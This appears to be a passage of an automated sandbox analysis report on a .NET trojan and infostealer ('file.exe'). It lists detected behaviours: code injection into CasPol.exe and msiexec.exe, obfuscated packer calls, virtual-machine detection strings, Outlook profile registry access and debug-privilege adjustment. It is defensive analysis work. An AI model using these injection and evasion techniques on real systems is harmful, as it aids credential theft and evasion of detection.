          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A10 NtQuerySection,2_2_01439A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A80 NtOpenDirectoryObject,2_2_01439A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439560 NtWriteFile,2_2_01439560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559840 NtDelayExecution,LdrInitializeThunk,4_2_04559840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04559860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559540 NtReadFile,LdrInitializeThunk,4_2_04559540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559560 NtWriteFile,LdrInitializeThunk,4_2_04559560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04559910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045595D0 NtClose,LdrInitializeThunk,4_2_045595D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045599A0 NtCreateSection,LdrInitializeThunk,4_2_045599A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559A50 NtCreateFile,LdrInitializeThunk,4_2_04559A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045596D0 NtCreateKey,LdrInitializeThunk,4_2_045596D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_045596E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559710 NtQueryInformationToken,LdrInitializeThunk,4_2_04559710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559FE0 NtCreateMutant,LdrInitializeThunk,4_2_04559FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559780 NtMapViewOfSection,LdrInitializeThunk,4_2_04559780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455B040 NtSuspendThread,4_2_0455B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559820 NtEnumerateKey,4_2_04559820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045598F0 NtReadVirtualMemory,4_2_045598F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045598A0 NtWriteVirtualMemory,4_2_045598A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559950 NtQueueApcThread,4_2_04559950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455AD30 NtSetContextThread,4_2_0455AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559520 NtWaitForSingleObject,4_2_04559520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045599D0 NtCreateProcessEx,4_2_045599D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045595F0 NtQueryInformationFile,4_2_045595F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559650 NtQueryValueKey,4_2_04559650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559670 NtQueryInformationProcess,4_2_04559670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559660 NtAllocateVirtualMemory,4_2_04559660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559610 NtEnumerateValueKey,4_2_04559610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559A10 NtQuerySection,4_2_04559A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559A00 NtProtectVirtualMemory,4_2_04559A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559A20 NtResumeThread,4_2_04559A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559A80 NtOpenDirectoryObject,4_2_04559A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559770 NtSetInformationFile,4_2_04559770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455A770 NtOpenThread,4_2_0455A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559760 NtOpenProcess,4_2_04559760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455A710 NtOpenProcessToken,4_2_0455A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559B00 NtSetValueKey,4_2_04559B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559730 NtQueryVirtualMemory,4_2_04559730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455A3B0 NtGetContextThread,4_2_0455A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045597A0 NtUnmapViewOfSection,4_2_045597A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C860 NtDeleteFile,4_2_0063C860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C810 NtReadFile,4_2_0063C810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C890 NtClose,4_2_0063C890
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C760 NtCreateFile,4_2_0063C760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C85A NtDeleteFile,4_2_0063C85A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C80A NtReadFile,4_2_0063C80A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C88B NtClose,4_2_0063C88B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0063C75B NtCreateFile,4_2_0063C75B
          Source: file.exe, 00000000.00000000.245150456.0000000000FBA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHBhG.exe* vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameHBhG.exe* vs file.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exeReversingLabs: Detection: 61%
          Source: file.exeVirustotal: Detection: 51%
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\30q5648k6Jump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@9/9
          Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: HBhG.pdbHw^w Pw_CorExeMainmscoree.dll source: file.exe
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: HBhG.pdb source: file.exe

          Data Obfuscation

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041157F push esp; ret 2_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_004115EB push esp; ret 2_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041B619 push edx; retf 2_2_0041B622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_00401E30 push eax; ret 2_2_00401E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0144D0D1 push ecx; ret 2_2_0144D0E4
          Source: C:\Windows\explorer.exeCode function: 3_2_05AA0BF5 push ebx; ret 3_2_05AA0BFE
          Source: C:\Windows\explorer.exeCode function: 3_2_0E0F0BF5 push ebx; ret 3_2_0E0F0BFE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0456D0D1 push ecx; ret 4_2_0456D0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0064114E push 889F0DC1h; retf 4_2_00641153
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_006397E6 push edx; retf 4_2_006397EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_006407D9 push edi; ret 4_2_006407DB
          Source: file.exeStatic PE information: 0xC2A5F7A7 [Sun Jun 25 22:52:23 2073 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9572107240717935
          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csHigh entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: file.exe, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.csHigh entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.csHigh entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: 0.0.file.exe.f20000.0.unpack, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.csHigh entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 1676Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3140Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01426B90 rdtsc 2_2_01426B90
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.8 %
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_006331A0 FindFirstFileW,FindNextFileW,FindClose,4_2_006331A0
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000003.462325908.000000000684F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.524083491.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
          Source: explorer.exe, 00000003.00000002.522356156.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
          Source: explorer.exe, 00000003.00000003.460995105.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.528827220.000000000F54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000003.462793270.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.462793270.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.259739427.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01426B90 rdtsc 2_2_01426B90
          Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0141B944 mov eax, dword ptr fs:[00000030h]2_2_0141B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0141B944 mov eax, dword ptr fs:[00000030h]2_2_0141B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013F9100 mov eax, dword ptr fs:[00000030h]2_2_013F9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013F9100 mov eax, dword ptr fs:[00000030h]2_2_013F9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013F9100 mov eax, dword ptr fs:[00000030h]2_2_013F9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FB171 mov eax, dword ptr fs:[00000030h]2_2_013FB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FB171 mov eax, dword ptr fs:[00000030h]2_2_013FB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FC962 mov eax, dword ptr fs:[00000030h]2_2_013FC962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01414120 mov eax, dword ptr fs:[00000030h]2_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01414120 mov eax, dword ptr fs:[00000030h]2_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01414120 mov eax, dword ptr fs:[00000030h]2_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01414120 mov eax, dword ptr fs:[00000030h]2_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01414120 mov ecx, dword ptr fs:[00000030h]2_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142513A mov eax, dword ptr fs:[00000030h]2_2_0142513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142513A mov eax, dword ptr fs:[00000030h]2_2_0142513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014841E8 mov eax, dword ptr fs:[00000030h]2_2_014841E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0141C182 mov eax, dword ptr fs:[00000030h]2_2_0141C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142A185 mov eax, dword ptr fs:[00000030h]2_2_0142A185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01422990 mov eax, dword ptr fs:[00000030h]2_2_01422990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FB1E1 mov eax, dword ptr fs:[00000030h]2_2_013FB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FB1E1 mov eax, dword ptr fs:[00000030h]2_2_013FB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_013FB1E1 mov eax, dword ptr fs:[00000030h]2_2_013FB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014769A6 mov eax, dword ptr fs:[00000030h]2_2_014769A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014261A0 mov eax, dword ptr fs:[00000030h]2_2_014261A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014261A0 mov eax, dword ptr fs:[00000030h]2_2_014261A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014751BE mov eax, dword ptr fs:[00000030h]2_2_014751BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014751BE mov eax, dword ptr fs:[00000030h]2_2_014751BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014751BE mov eax, dword ptr fs:[00000030h]2_2_014751BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014751BE mov eax, dword ptr fs:[00000030h]2_2_014751BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01410050 mov eax, dword ptr fs:[00000030h]2_2_01410050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01410050 mov eax, dword ptr fs:[00000030h]2_2_01410050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014B2073 mov eax, dword ptr fs:[00000030h]2_2_014B2073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014C1074 mov eax, dword ptr fs:[00000030h]2_2_014C1074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01477016 mov eax, dword ptr fs:[00000030h]2_2_01477016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01477016 mov eax, dword ptr fs:[00000030h]2_2_01477016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01477016 mov eax, dword ptr fs:[00000030h]2_2_01477016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014C4015 mov eax, dword ptr fs:[00000030h]2_2_014C4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014C4015 mov eax, dword ptr fs:[00000030h]2_2_014C4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0140B02A mov eax, dword ptr fs:[00000030h]2_2_0140B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0140B02A mov eax, dword ptr fs:[00000030h]2_2_0140B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0140B02A mov eax, dword ptr fs:[00000030h]2_2_0140B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0140B02A mov eax, dword ptr fs:[00000030h]2_2_0140B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142002D mov eax, dword ptr fs:[00000030h]2_2_0142002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142002D mov eax, dword ptr fs:[00000030h]2_2_0142002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142002D mov eax, dword ptr fs:[00000030h]2_2_0142002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142002D mov eax, dword ptr fs:[00000030h]2_2_0142002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0142002D mov eax, dword ptr fs:[00000030h]2_2_0142002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0148B8D0 mov eax, dword ptr fs:[00000030h]2_2_0148B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0148B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0148B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0148B8D0 mov eax, dword ptr fs:[00000030h]2_2_0148B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0148B8D0 mov eax, dword ptr fs:[00000030h]2_2_0148B8D0
